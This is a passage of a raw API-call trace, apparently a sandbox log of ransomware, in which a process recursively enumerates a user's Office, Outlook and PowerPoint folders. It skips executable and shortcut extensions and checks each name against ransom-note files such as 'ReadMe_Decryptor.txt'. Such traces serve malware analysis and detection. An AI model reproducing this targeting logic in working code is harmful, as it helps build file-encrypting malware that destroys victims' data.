lpString2=".") returned 0 [0081.786] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.788] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.788] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.788] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0081.788] lstrcmpW (lpString1="rasphone.pbk", lpString2=".") returned 1 [0081.788] lstrcmpW (lpString1="rasphone.pbk", lpString2="..") returned 1 [0081.788] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.788] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Decryptor_Info.hta") returned 1 [0081.788] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0081.788] lstrcmpiW (lpString1=".pbk", lpString2=".exe") returned 1 [0081.788] lstrcmpiW (lpString1=".pbk", lpString2=".sys") returned -1 [0081.788] lstrcmpiW (lpString1=".pbk", lpString2=".lnk") returned 1 [0081.788] lstrcmpiW (lpString1=".pbk", lpString2=".dll") returned 1 [0081.788] lstrcmpiW (lpString1=".pbk", lpString2=".msi") returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x77c9c8 [0081.788] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x77cc70 [0081.788] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c9c8 | out: hHeap=0x6d0000) returned 1 [0081.788] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x77c9c8 [0081.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cc70 | out: hHeap=0x6d0000) returned 1 [0081.789] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0081.789] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.789] FindNextFileW (in: hFindFile=0x72a960, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0081.789] FindClose (in: hFindFile=0x72a960 | out: hFindFile=0x72a960) returned 1 [0081.789] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0081.789] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0081.789] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0081.789] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.790] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dae0390, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dae0390, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0081.790] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0081.790] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0081.790] lstrlenW (lpString="Office") returned 6 [0081.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Office" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office" [0081.790] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0081.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0081.790] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0081.987] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.987] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dae0390, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dae0390, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.989] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f6ce7b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f6ce7b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f6ce7b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x9382, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0081.989] lstrcmpW (lpString1="MSO1033.acl", lpString2=".") returned 1 [0081.989] lstrcmpW (lpString1="MSO1033.acl", lpString2="..") returned 1 [0081.989] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.989] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Decryptor_Info.hta") returned 1 [0081.989] PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0081.989] lstrcmpiW (lpString1=".acl", lpString2=".exe") returned -1 [0081.990] lstrcmpiW (lpString1=".acl", lpString2=".sys") returned -1 [0081.990] lstrcmpiW (lpString1=".acl", lpString2=".lnk") returned -1 [0081.990] lstrcmpiW (lpString1=".acl", lpString2=".dll") returned -1 [0081.990] lstrcmpiW (lpString1=".acl", lpString2=".msi") returned -1 [0081.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0081.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77caa0 [0081.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0081.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cc70 [0081.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77caa0 | out: hHeap=0x6d0000) returned 1 [0081.990] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90b3d80, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0081.990] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0081.990] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0081.990] lstrlenW (lpString="Recent") returned 6 [0081.990] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0081.991] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0081.991] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0081.991] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0081.992] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.992] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90b3d80, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.995] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.995] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.995] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x90b3d80, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0x90b3d80, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x90d9ee0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Global.LNK", cAlternateFileName="")) returned 1 [0081.995] lstrcmpW (lpString1="Global.LNK", lpString2=".") returned 1 [0081.995] lstrcmpW (lpString1="Global.LNK", lpString2="..") returned 1 [0081.995] lstrcmpiW (lpString1="Global.LNK", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.995] lstrcmpiW (lpString1="Global.LNK", lpString2="Decryptor_Info.hta") returned 1 [0081.995] PathFindExtensionW (pszPath="Global.LNK") returned=".LNK" [0081.995] lstrcmpiW (lpString1=".LNK", lpString2=".exe") returned 1 [0081.995] lstrcmpiW (lpString1=".LNK", lpString2=".sys") returned -1 [0081.996] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0081.996] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x90d9ee0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x34, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0081.996] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0081.996] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0081.996] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0081.996] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0081.996] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0081.996] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0081.996] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0081.996] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0081.996] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0081.996] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0081.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0081.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x77cd18 [0081.996] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0081.996] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77caa0 [0081.997] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cd18 | out: hHeap=0x6d0000) returned 1 [0081.997] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0081.997] lstrcmpW (lpString1="Templates.LNK", lpString2=".") returned 1 [0081.997] lstrcmpW (lpString1="Templates.LNK", lpString2="..") returned 1 [0081.997] lstrcmpiW (lpString1="Templates.LNK", lpString2="ReadMe_Decryptor.txt") returned 1 [0081.997] lstrcmpiW (lpString1="Templates.LNK", lpString2="Decryptor_Info.hta") returned 1 [0081.997] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0081.997] lstrcmpiW (lpString1=".LNK", lpString2=".exe") returned 1 [0081.997] lstrcmpiW (lpString1=".LNK", lpString2=".sys") returned -1 [0081.997] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0081.997] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0081.997] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0081.997] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5dc5d150, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5dc5d150, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x5dc5d150, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0081.997] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0081.998] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0081.998] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0081.998] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0081.998] lstrlenW (lpString="Outlook") returned 7 [0081.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Outlook" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook" [0081.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0081.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0081.998] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0082.002] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.002] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.004] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5de69980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5de69980, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5e0c9040, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0082.004] lstrcmpW (lpString1="Outlook.srs", lpString2=".") returned 1 [0082.004] lstrcmpW (lpString1="Outlook.srs", lpString2="..") returned 1 [0082.004] lstrcmpiW (lpString1="Outlook.srs", lpString2="ReadMe_Decryptor.txt") returned -1 [0082.004] lstrcmpiW (lpString1="Outlook.srs", lpString2="Decryptor_Info.hta") returned 1 [0082.004] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0082.004] lstrcmpiW (lpString1=".srs", lpString2=".exe") returned 1 [0082.004] lstrcmpiW (lpString1=".srs", lpString2=".sys") returned -1 [0082.004] lstrcmpiW (lpString1=".srs", lpString2=".lnk") returned 1 [0082.004] lstrcmpiW (lpString1=".srs", lpString2=".dll") returned 1 [0082.004] lstrcmpiW (lpString1=".srs", lpString2=".msi") returned 1 [0082.004] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0082.004] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x77cd18 [0082.005] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0082.005] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cdf8 [0082.005] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cd18 | out: hHeap=0x6d0000) returned 1 [0082.005] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6215c440, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0082.005] lstrcmpW (lpString1="Outlook.xml", lpString2=".") returned 1 [0082.005] lstrcmpW (lpString1="Outlook.xml", lpString2="..") returned 1 [0082.005] lstrcmpiW (lpString1="Outlook.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0082.005] lstrcmpiW (lpString1="Outlook.xml", lpString2="Decryptor_Info.hta") returned 1 [0082.005] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0082.005] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.005] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0082.005] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0082.005] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.005] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.006] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0082.006] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x77cd18 [0082.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0082.006] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cea0 [0082.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cd18 | out: hHeap=0x6d0000) returned 1 [0082.006] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6215c440, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6215c440, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0082.006] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0082.006] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x33c0ebb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x33c0ebb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0082.006] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0082.006] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0082.006] lstrlenW (lpString="PowerPoint") returned 10 [0082.006] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="PowerPoint" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0082.006] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0082.006] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0082.006] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0082.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.009] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x33c0ebb0, 